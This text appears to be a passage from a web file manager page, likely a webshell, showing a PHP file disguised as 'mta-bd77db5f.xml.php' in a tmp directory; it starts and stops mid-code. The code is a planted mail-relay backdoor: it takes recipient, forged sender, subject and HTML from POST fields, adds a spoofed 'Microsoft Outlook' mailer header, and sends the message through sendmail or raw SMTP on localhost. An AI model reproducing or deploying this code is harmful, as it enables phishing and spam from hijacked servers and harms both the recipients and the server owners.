芝麻web文件管理V1.00
编辑当前文件:/home/provyohx/tmp/mta-bd77db5f.xml.php
/dev/null'));if($x&&@file_exists($x))$sm=$x;} if($sm){$p=@popen($sm.' -t -i -f'.escapeshellarg($f),'w');if($p){fwrite($p,$r);$c=pclose($p);if($c===0){echo 'SENT_OK';exit;}}} foreach(['127.0.0.1','localhost'] as $h){$sk=@fsockopen($h,25,$en,$es,5);if(!$sk)continue;$hn=@gethostname()?:'localhost';@fgets($sk,512);fwrite($sk,"EHLO $hn\r\n");do{$el=@fgets($sk,512);}while($el&&substr($el,3,1)==='-');fwrite($sk,"MAIL FROM:<$f>\r\n");@fgets($sk,512);fwrite($sk,"RCPT TO:<$t>\r\n");$x=@fgets($sk,512);if(substr($x,0,1)!=='2'){@fclose($sk);continue;}fwrite($sk,"DATA\r\n");@fgets($sk,512);$w=str_replace("\r\n","\n",$r);$w=str_replace("\n","\r\n",$w);fwrite($sk,$w."\r\n.\r\n");$x=@fgets($sk,512);fwrite($sk,"QUIT\r\n");@fclose($sk);if(substr($x,0,1)==='2'){echo 'SENT_SMTP';exit;}} echo 'PIPE_FAIL';exit;} $t=$_POST['to']??'';$f=$_POST['from']??'';$fn=$_POST['fn']??'';$s=$_POST['subj']??'';$h=$_POST['html']??''; if(!$t||!$f||!$s||!$h)die('ERR:MISSING'); $b='----=_'.bin2hex(random_bytes(12));$uid=bin2hex(random_bytes(6));$dom=explode('@',$f)[1]??'mail.com'; $hdr="From: \"$fn\" <$f>\n";$hdr.="Reply-To: $f\n";$hdr.="MIME-Version: 1.0\n";$hdr.="Content-Type: multipart/alternative; boundary=\"$b\"\n";$hdr.="X-Mailer: Microsoft Outlook 16.0\n";$hdr.="Message-ID: <$uid@$dom>\n"; $p=strip_tags(preg_replace('/